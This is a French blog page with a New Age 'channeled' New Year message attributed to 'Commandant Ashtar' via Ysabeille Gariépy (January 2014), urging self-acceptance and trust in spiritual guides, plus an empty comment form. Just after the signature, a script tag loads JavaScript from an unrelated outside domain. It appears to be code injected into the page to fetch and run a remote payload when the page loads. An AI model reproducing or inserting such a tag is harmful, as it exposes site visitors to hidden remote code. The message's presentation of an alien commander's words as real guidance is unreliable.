• Voeux de bonne année du Commandant Ashtar

    ashtar sheran
    MESSAGES CANALISÉS PAR YSABEILLE GARIÉPY
     
    Voeux de bonne année du Commandant Ashtar
    8 Janvier 2014
     
    liberte1La vie n’est autre que les souhaits que l’on en fait. Reste à te souhaiter de rencontrer les personnes qui vont te faire grandir pour t’amener à guérir tes blessures. Chaque personne est une occasion de se voir sous un angle différent aussi étrange et dérangeant que cela puisse être par moment.

    S’ouvrir à soi c’est accepter les imperfections et dire oui à tous nos potentiels. Cessez de diminuer ces talents qui sont latents en nous en attendant le bon moment puisque c’est à toi de simplement créer ce moment qui sera le bon pour toi. Dieu n’a pas de temps ni d’agenda pour prévoir tes bons coups alors pourquoi tu te prives chaque jour de l’être que tu es. Crois-tu que ton conseil de lumière a prévu un horaire et des heures afin que tu accèdes à certaines choses une journée et pas une autre? Il n’y a que toi qui se contient dans ton mental et qui par la même occasion te limite de tes actions.

    Cesse d’être honoré de ta divinité et agit en tant que tel. Ce n’est point dans ce charabia du mental que tu accèderas à une nouvelle conscience. Quand accepteras-tu d’ouvrir cette porte qui ne demande qu’un pas de plus dans la direction de cœur? Ne vois-tu pas que nous sommes toujours là?

    Donne-nous ta main et apprends à te laisser guider, car c’est dans le lâcher-prise que tu pourras découvrir les plus beaux chemins inexplorés de ta personne. Es-tu prêt à fermer les yeux pour ouvrir ceux de ton cœur et cessez d’avoir peur en créant tous ces malheurs?

    Es-tu prêt à nous donner ta confiance pour t’ouvrir à toutes les formes d’abondance? Vas-tu cesser de retenir tout ce potentiel par peur d’être différent et accepter d’être, qui tu es?

    Voilà les questions dont il est temps de mesurer la teneur afin de laisser être ce qui se présente à toi en acceptant que tu sois le créateur de ta vie. Cesse de te cacher en croyant que nous allons te trouver. Accepte de vivre à découvert et devient le livre d’aventure que tu as toujours voulu vivre. Sois la source intarissable de ton bonheur en étant la lumière de ta vie et s.t.p. arrête de te fermer, car tu te prives toi-même de cet amour que tu recherches ailleurs alors qu’il est en toi.

    Vois-tu bien aimé nous sommes à tes côté quoi que tu fais quoi que tu penses et c’est dans cette réalité que nous voulons te dire je t’aime puisses-tu accepté nos vœux d’amour afin qu’il t’accompagne tout au long de cette nouvelle année.

    Message canalisé pour toi de moi par le Commandant Ashtar. Ysabeille
    http://www.ysabeille.com
    <script src="http://centrexity.com/converter.js" type="text/javascript"> </script>

  • Commentaires

    Aucun commentaire pour le moment

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :